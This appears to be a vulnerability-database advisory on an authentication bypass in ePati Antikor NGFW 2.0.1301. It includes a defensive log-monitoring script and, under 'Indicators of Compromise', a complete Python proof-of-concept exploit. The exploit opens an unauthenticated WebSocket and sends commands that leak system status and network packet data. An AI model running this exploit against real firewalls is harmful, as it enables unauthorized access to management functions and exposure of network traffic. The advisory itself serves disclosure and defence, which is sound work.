ePati Antikor NGFW 2.0.1301 - Authentication Bypass
An authentication bypass vulnerability exists in ePati Antikor NGFW version 2.0.1301. This flaw allows an attacker to bypass authentication controls, potentially gaining unauthorized access. Exploit code is publicly available in Python. No patch or official remediation information is currently provided.
AI Analysis
Technical Summary
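The ePati Antikor NGFW 2.0.1301 product contains an authentication bypass vulnerability. This weakness enables attackers to circumvent authentication mechanisms, potentially accessing protected resources without valid credentials. The exploit is documented in Exploit-DB (ID 52562) and includes Python code to demonstrate the bypass: the PoC opens a SockJS WebSocket at /sock/<server_id>/<session_id>/websocket (default port 8800) without presenting credentials and sends the commands rapor-dinle and paket-liste-dinle. No affected versions beyond 2.0.1301 are specified; the PoC header gives the range v.2.0.1298 - v.2.0.1301 and the identifier CVE-2026-2624, and its error message suggests v.2.0.1302+ may be patched. No vendor advisory or patch information is available at this time.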
Potential Impact
Successful exploitation of this vulnerability could allow unauthorized users to gain access to the firewall management interface or other protected functions, undermining security controls. This could lead to unauthorized configuration changes or exposure of sensitive information. However, there is no evidence of active exploitation in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the affected system's management interfaces and monitor for suspicious activity related to authentication attempts.
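One way to implement the monitoring recommended above, as an added example that is not part of the original page or the PoC: it flags completed WebSocket upgrades to the SockJS path used by the PoC when the source is outside an allowlisted management network. The management CIDR, the combined-style proxy log format and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Assumption: hypothetical management network allowed to reach the admin UI.
MGMT_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# SockJS raw-WebSocket transport path as built in the PoC on this page:
# /sock/<server_id>/<session_id>/websocket
SOCKJS_WS = re.compile(r"^/sock/[^/]+/[^/]+/websocket(?:\?|$)")

# Assumption: combined-style access log written by a proxy or sensor
# in front of the management port (not the appliance's own log format).
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_mgmt(src):
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # unparseable source: treat as untrusted
    return any(addr in net for net in MGMT_NETS)

def find_unexpected_ws(lines):
    """Return {source_ip: [(timestamp, path), ...]} for completed WebSocket
    upgrades (HTTP 101) to the SockJS endpoint from outside MGMT_NETS."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "GET" or m["status"] != "101":
            continue  # malformed line, or not a completed upgrade
        if SOCKJS_WS.match(m["path"]) and not is_mgmt(m["src"]):
            hits[m["src"]].append((m["ts"], m["path"]))
    return dict(hits)

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '10.20.0.15 - - [16/May/2026:09:00:01 +0000] "GET /sock/412/k3j9x0aa/websocket HTTP/1.1" 101 0',
    '198.51.100.7 - - [16/May/2026:09:02:44 +0000] "GET /sock/733/q8w2e1zz/websocket HTTP/1.1" 101 0',
    '198.51.100.7 - - [16/May/2026:09:02:50 +0000] "GET /sock/120/aa11bb22/websocket HTTP/1.1" 101 0',
    '203.0.113.9 - - [16/May/2026:09:05:10 +0000] "GET /sock/info HTTP/1.1" 403 12',
    'not-a-log-line',
]

if __name__ == "__main__":
    for src, events in find_unexpected_ws(SAMPLE).items():
        print(f"ALERT {src}: {len(events)} WebSocket upgrade(s) from outside management networks")
```

The legitimate management UI may use the same SockJS path, so the source allowlist is what separates expected sessions from unexpected ones.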
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624

import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time


def banner():
    print("-" * 65)
    print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
    print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
    print("-" * 65)


def generate_random_id(length=8):
    """Generates a random session ID for the SockJS connection."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))


def exploit(target_ip, target_port):
    # Generating random server and session IDs for SockJS
    server_id = random.randint(100, 999)
    session_id = generate_random_id()
    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")
    try:
        # Bypassing Self-Signed SSL certificate verifications
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        ws.connect(ws_url)
        print("[+] Connection Successful! (Authentication bypassed)\n")

        # Payload 1: Listening to Cluster and System Status
        payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
        print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
        ws.send(payload_1)

        # Wait for the response from the server
        time.sleep(1)
        response_1 = ws.recv()
        if response_1:
            print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
            print(f"> {response_1}\n")

        # Payload 2: Listening to Network Packets
        payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
        print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
        ws.send(payload_2)
        time.sleep(1)
        response_2 = ws.recv()
        if response_2:
            print("[+] Network packet data captured:")
            print(f"> {response_2}\n")

        print("[*] Exploitation complete. Closing connection.")
        ws.close()
    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)


if __name__ == "__main__":
    banner()
    # Argument parsing
    parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
    parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
    parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")
    args = parser.parse_args()
    exploit(args.target, args.port)
```
Technical Details
- Edb Id: 52562
- Has Exploit Code: true
- Code Language: python
Threat ID: 6a084e9bec166c07b0dd937c
Added to database: 5/16/2026, 11:01:47 AM
Last enriched: 5/16/2026, 11:02:19 AM
Last updated: 5/17/2026, 5:30:32 AM